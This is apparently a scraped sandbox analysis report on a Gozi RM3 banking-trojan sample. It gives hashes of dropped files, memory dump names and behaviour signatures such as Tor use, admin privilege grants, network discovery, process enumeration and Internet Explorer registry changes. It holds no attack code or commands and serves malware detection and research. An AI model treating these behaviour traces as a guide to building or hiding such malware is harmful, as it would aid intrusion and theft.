| MD5 | d456f4da9b60e70744fc1d3492130437 |
| SHA1 | e721393fd973986ae5e965f2ced2506c54708e2e |
| SHA256 | bbe537ea5aba3262de669dd6aba27be1e28707f046ade852a3a3082a19c0e541 |
| SHA512 | 55930d623887eafbd93cfe8da972227bb4f159ecfc300562450f72974525193d65cefce6ac0d2e4b550e7e1c8b29192b24a622e98ffa563d33d987ad53737e7d |
\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.0.cs
| MD5 | 697f16b8c6892082559d8a17db343865 |
| SHA1 | 246d6ba1419478be7915e78b61525da894321fb9 |
| SHA256 | 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f |
| SHA512 | 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC20.tmp
| MD5 | 32ef79ada32c2c2aac964c292c338d9c |
| SHA1 | a847f9e830ee32eb54aedae7a5a6152ffb78dd95 |
| SHA256 | dba94e58c55d3e1e42a2dcbe68fbd319702714e587ea8e19ef9427b9c1b740ee |
| SHA512 | 614c694b3bf0dc31b0b54072340c181cc710e9acd425c246eabe1dae05bb124d0413fbeed4541c60e434122e5302c1dbc1f104013f5ba596d0a0b1ddd76c6265 |
C:\Users\Admin\AppData\Local\Temp\RES21.tmp
| MD5 | 367cc1ea803e51f6373873e2fae1b614 |
| SHA1 | 0716aeb25b03d2039b52d4858a72dd1f30141d6e |
| SHA256 | 49d20edbe5ede206071a7071a93616ea281154046845f4a702eb42cb722de6a1 |
| SHA512 | e6bdbabc0c8dc0ad4f794e43abc72480cd9ab6c0d4636eedf48baf5661eb7d0a4a38878fb8322f23330f4b3314dcc44bb846cbc2ac351aa5704f156cad647799 |
C:\Users\Admin\AppData\Local\Temp\adua5uv0.dll
| MD5 | 1128201d45c30519cccd84ddd9b0d894 |
| SHA1 | d505ec80cef79a255949c86c88f6d75770c1bbfd |
| SHA256 | 653dda67447686b2d7d6c91d0183920461fb38698d3a4cec849f71ecfa5ac302 |
| SHA512 | eb3835b33db10c7b29fe95b4857888fe5f08892a1fdc7c8552820e4db3230132880df06c5a6643d0024e36e4572faab92bcd06dd74fccf6d827297dfc88091df |
C:\Users\Admin\AppData\Local\Temp\adua5uv0.pdb
| MD5 | 8071cc09c71db6ec209768f4debc80ee |
| SHA1 | 4916a8d80d95e1cd4a505d8197cd42faca4ca8cf |
| SHA256 | dd503ab6fceccddb655c51bb7d361cf7eb6cb0f91ab586f583b966f09b1a068f |
| SHA512 | c2b07e16ab7fec5b02075c2aa5d731a038f447d2c4d0da35e84434234ed6a2533b70cc8e1883531f6edc912ad2a6b6d993e6a74df2b321ae8b153de46fc57b5c |
memory/1292-110-0x000000001B660000-0x000000001B673000-memory.dmp
memory/304-111-0x00000000002D0000-0x0000000000311000-memory.dmp
memory/1368-112-0x00000000029B0000-0x00000000029C5000-memory.dmp
memory/1368-718-0x0000000002990000-0x00000000029A5000-memory.dmp
C:\Users\Admin\~Columnsoftware.DDF
| MD5 | 3e25bda21d35fe79e726d526d9ceb030 |
| SHA1 | e9e8d6070068e019b5243b6cd4d5e24b12dd8796 |
| SHA256 | 8f6e21ab45d1631d565b15bd8367d6a1702219c3c21d95200f7c2b37dd2d5a34 |
| SHA512 | 6b48ef106bccf877635c496f7d25c72f75993311f7f1189e0437c16616b26c9d62c9dddd7f8962dd5bf349f6125f93c124376f634231ef768f56c5a0280c308e |
C:\Users\Admin\~Columnsoftware_LAYOUT.INF
| MD5 | 7aacfc1d6af97be98a41d4e8d7087332 |
| SHA1 | 75770af6f11a2aed72c96d0996818fa6e3f0780d |
| SHA256 | fef82285bf4b68a83b4a2d011a203e170be145ce850ec6cf6985616dbf61675c |
| SHA512 | 07ee854501c49af974691f261dc88a52074133ae33382f554b2e6c026fea3dd8778ba404780e4ea8c4089d70ae4d0e5a7ea66d70d08ab2bbdda292d4fdefd518 |
C:\Users\Admin\~Columnsoftware.RPT
| MD5 | 93d6c414c2c5115499497110d7c4bb8e |
| SHA1 | 22b1c6cf1dbf3be56bd810c1306eec7dd930edb4 |
| SHA256 | 085b77cd3e8eceae456842612c1aed3608b6332d0809dd1c2c24b0468f8926dd |
| SHA512 | f746af12b5606bea7535482842bfb1e0513efdf999e7fa378e077eabe6bb69ac448aa5bfc2d7dacb54daf5903174f169fb082e9ddcfd210ff3220f9db5447fec |
C:\Users\Admin\~Columnsoftware.CAB
| MD5 | 3c234cb15748c957069af8ae2cc42039 |
| SHA1 | 1d9faa7321914af5ad01e74ba6a3dd1a496cd68d |
| SHA256 | fc7ade38fe0eaebfe886ff998593ee34f5d0d724274eb876ffb30d0f36807da1 |
| SHA512 | 27cb59f24874705d9d7c8d080a58d5fb270c0ab34d435a81f6d13639807a4a08d665d4ba3076285c178d9d7cf78d897355660fac6db15e7ff29f5de837cf4222 |
C:\Users\Admin\AppData\Local\Temp\5BA0.bin0
| MD5 | 768165e0abf16bf3056836d5431a7296 |
| SHA1 | 9fb3196be60e49bfc319ebd9e0b103954d711e34 |
| SHA256 | b44c505b721e93e2a596577018cc65b993cd632b9fe7620a4b3db54031afff5d |
| SHA512 | 1250ec40ba20f39a5b9a3aafd45c63cb6f1bf48b89acce1f885470c936fb48a803081943c68458ba1adce92d5fe79d3e45682285f56ecb29884d41974269992d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 5f5179cca63bdf7f82bf9868710984e7 |
| SHA1 | 899dcdea948341125761e3b5a6c99a8e868eb937 |
| SHA256 | e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72 |
| SHA512 | 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 5f5179cca63bdf7f82bf9868710984e7 |
| SHA1 | 899dcdea948341125761e3b5a6c99a8e868eb937 |
| SHA256 | e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72 |
| SHA512 | 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | f730411a9a43c7d05a451c3b646a4b86 |
| SHA1 | 5f79b8f800b68fa4509f21a4ef3bf61922d515dc |
| SHA256 | bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f |
| SHA512 | 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | f730411a9a43c7d05a451c3b646a4b86 |
| SHA1 | 5f79b8f800b68fa4509f21a4ef3bf61922d515dc |
| SHA256 | bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f |
| SHA512 | 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 77c4ec68d22d4a45b126647d83f0c387 |
| SHA1 | dd09bf1f2448a85096dc09c5b8305f25bd979f57 |
| SHA256 | f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6 |
| SHA512 | 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 77c4ec68d22d4a45b126647d83f0c387 |
| SHA1 | dd09bf1f2448a85096dc09c5b8305f25bd979f57 |
| SHA256 | f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6 |
| SHA512 | 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 50123f5383e92fb265949158b9972f0b |
| SHA1 | d75e071a98c9ebdd48e70b0d4bef171d9df5611d |
| SHA256 | 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa |
| SHA512 | 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 50123f5383e92fb265949158b9972f0b |
| SHA1 | d75e071a98c9ebdd48e70b0d4bef171d9df5611d |
| SHA256 | 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa |
| SHA512 | 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | cad53cca46626dd11590e9a0011847f0 |
| SHA1 | abeddf2e3e6b4e503281e152270c872ba2ad90af |
| SHA256 | 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2 |
| SHA512 | 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | cad53cca46626dd11590e9a0011847f0 |
| SHA1 | abeddf2e3e6b4e503281e152270c872ba2ad90af |
| SHA256 | 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2 |
| SHA512 | 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 893f8524287e635bc325c12517b1eca9 |
| SHA1 | 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94 |
| SHA256 | 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a |
| SHA512 | 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 893f8524287e635bc325c12517b1eca9 |
| SHA1 | 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94 |
| SHA256 | 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a |
| SHA512 | 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 01f148eb1c87e87e79f1cb57591e1f9e |
| SHA1 | e1536cbec4ab23ba0b508a2799ccb9925088b8ab |
| SHA256 | e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071 |
| SHA512 | ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 01f148eb1c87e87e79f1cb57591e1f9e |
| SHA1 | e1536cbec4ab23ba0b508a2799ccb9925088b8ab |
| SHA256 | e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071 |
| SHA512 | ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 1b0c5c633d5f11e84a546f436da6edfb |
| SHA1 | 6f68c61a04083147f97e0d09b2ae3ca3206afe8d |
| SHA256 | 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12 |
| SHA512 | 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 1b0c5c633d5f11e84a546f436da6edfb |
| SHA1 | 6f68c61a04083147f97e0d09b2ae3ca3206afe8d |
| SHA256 | 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12 |
| SHA512 | 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 348ea633774cdb59e525c1744df6608b |
| SHA1 | f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d |
| SHA256 | 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de |
| SHA512 | f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 348ea633774cdb59e525c1744df6608b |
| SHA1 | f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d |
| SHA256 | 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de |
| SHA512 | f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 69101071e1de615d8449b4a118d51e2e |
| SHA1 | 9a04639583310c6f0dbb15dcdcb81a480e54dd22 |
| SHA256 | c464da6490735ef3e20d33d4a4624af00bb3e3a942d6a588fcc618c5ec6e138e |
| SHA512 | 8a99c0d080af7cfdc2914840e6b36cf5dd706dcf0254c65347b3c5b10aefd2296529fdf3b5bf8ff00fab9331a06ce4a296e6bcf342fbe3ed1464d59b26665dd0 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-15 08:05
Reported
2022-03-15 08:35
Platform
win10v2004-en-20220113
Max time kernel
1696s
Max time network
1776s
Command Line
Signatures
Gozi RM3
Grants admin privileges
Uses Tor communications
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Restr.exe |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317671783" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1064f97d4338d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000af0b005e4d17189b80f17a7a9b9fae8dde5b3ee941963c35b330c332e6c35938000000000e800000000200002000000032baa51108dee1171cafe41bc03a45193341b239dbbd1408288a071e2f31768cc00000008ca69103c90cbb9d70b1dc7a31329374def34971f2aee6fbf1665acd6aaf5680586a96c25d07de46f72c857cd5be0137b5b4c77015a65ead41299de3b7b25e906d0554705b4ca6e6ad0056c11cbd420825ea7b34e4316dcacb0a6f31764665ac9b9640f2d0da0c5d3828eeb7fb42f1f88e7d024a56954cf1bbc8f3266f7f0e2b352dd10f2f04ee5e9ae47bb8baa33fbba0f98fc0c9bfe063f614272d2285f8a4eeed9b63edf4ea9e8e3f48a2df5965aeac7cbdd08b7725051a082d5fccb20603400000005832b57c34f5d8a5a89e69e152e47853950844bd6fed7a58a134c958bf9abafdbf9c8638699242eddfcd4935002207c77e54ae8c0073a45a376167519021c399 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000694908dbfb46b57cd6968555a943005e9119959593d00753b9321fd109749f6f000000000e8000000002000020000000bb00d8a1068d77372474e6e05666d87be8542d8d50dcfa6309fd3e30a23dcc6120000000bdd9b023ff3c8e96d682cc50e317e1622624ec1843c96d1648c5d9f55206baf84000000092099aac9dd1ede2d30e05180d80f415c8a1be5f00a5222873d56860a8a83c00fbf63ab02ece3f848ccc883fa7e0f00e778ae2c5406c37d5c1f8592155cdcf78 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000e326887780a1cc42463cf93e23f06042acd5c980d89817792e775c618e0d43b8000000000e800000000200002000000055abac4686cabcc75247a81859be176f7a560c2c5bfd9dda27ff2afd67379033c00000002ff4356701135e094e80d75fdaecb8ab772ee676e5e01642c2a33e9bbf7e50375c8ee026ab0ccedb8787c7227d038aa46a402eca5c23325f7a4a451fdf6550daef8010e84deb2c9233436cb973eef1bf3aee4f921b581c1a1a27ad861e06fe37e191674716cb4ba64c2b6cbb6a4ca3d6e00a03571ff046a6fb7ca87f8b162b50f986670d5dd33eabbebccd8d2078011006a75e6db928b405f228ed9e790a55394f4503bb8024ecc4a3c69714d843817dd540a43745fb7767daf7ee1ddc22443840000000d014b15674dd9636b3652290fec5ed434ee14b05cd1fd10a50f2a0a2459d7129398ae538fb5ae639fd49cf02f80b36dd2733af24d7c80a0f0f37a0be1badc496 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947395" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000003b5e9f8a3527493be13b41a2ebf9589c6a62d994d237ab9a902929e775e008db000000000e8000000002000020000000cc4c139c1f3d8410a3fd4853043fbe56b3d607b907b48298c54eacf00a9abd47c000000089e50698452806b0aee4c5b9089a35317661a825ac7b9d014527f1bcea9113a7ef7c06ac14da56fbee2af2dffcd63be96c075c9d8669adb3ee1122baf68e8e3a142f0ecb52f0046426d9aebb71f83e81d052bdb33f00fe5e454da98ca70b35a105afbaeb1f1aac26a1b3cbfd5552ec2bb815cba9fce85e4e284027fb3a5c50ec101b8f150dec2c9304f7ba46fe8660bb4c822f437fb42b08d6d262fed0f90354504905d57ed89a0a20333c547e510e2f60d76f146a03e117168ef32b23af7a4f40000000015aa826f466813f1d71d4311b3427b7a381f759fb95d11b8a0305c39a3d97ff37ea1b218cb305c18ac1d2bc089c6aa515ec559afab86ac24cd68446d0989b39 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B5C4DBF1-A436-11EC-B9A4-4AFEF23D9694} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000002b81c0d1b0f11c7d4a69ac85f855dd5d3531371c745e79c1748263e9f65aafd7000000000e8000000002000020000000dec3bf4126fc2cec7658286bf2e75aea9cd303e274940af838a83d99b480d4a4c00000006a2273a44b604d49362481938faa54560d195fa9f572a0a70def88063b2e9ad78e8e23cea03120b97dc5495883d4a4d685fd288eb16ce0ebc9f0efaa8c6b0980c3286da79ce6fe3a2785adb3234965c736173a61fdf2ef35ec210c1a0a7ff3079f02b801b4f94159e3f1413998d7afbe4a6700c1257ec98e75f4a984f059e5e25d2f7c4c0bd78d47ec8f2a5a63f5c24a6ed338bad5258a4a45e294fb404b8319db27e63f91e15f40a8e0c863ff3e38fda6f967df22b01efdba3f2d90cc58b390400000008eab2544967c183af1aa951bde7de48503e099d1f9f342e1cc63bdf17b379cc3fbf7a265e549ff3d69a16a024e76b5ff318f32fd03c6ad372e8d81b1f79e8fe6 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000008b909b8338d4738f4b3b2e4dcbe9cf0e2b037d12806396cf22528efc111641bb000000000e8000000002000020000000366574914b9a1bd144898af76963d69ad400b90ba988cc139251325775b3fe2d200000001129b6fe636ba60b01daa27e12b9ab8fdc1487eff7892c55d8b815f2cb97ee5440000000f7cdcb0ff5fdc78d44c377472c443e9f35b6f7984431996e83c3ea46c09db82d47785179d8f732a0b5ffafb83318a2edcf3f22a3964433b7815b60c96d4348bb | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
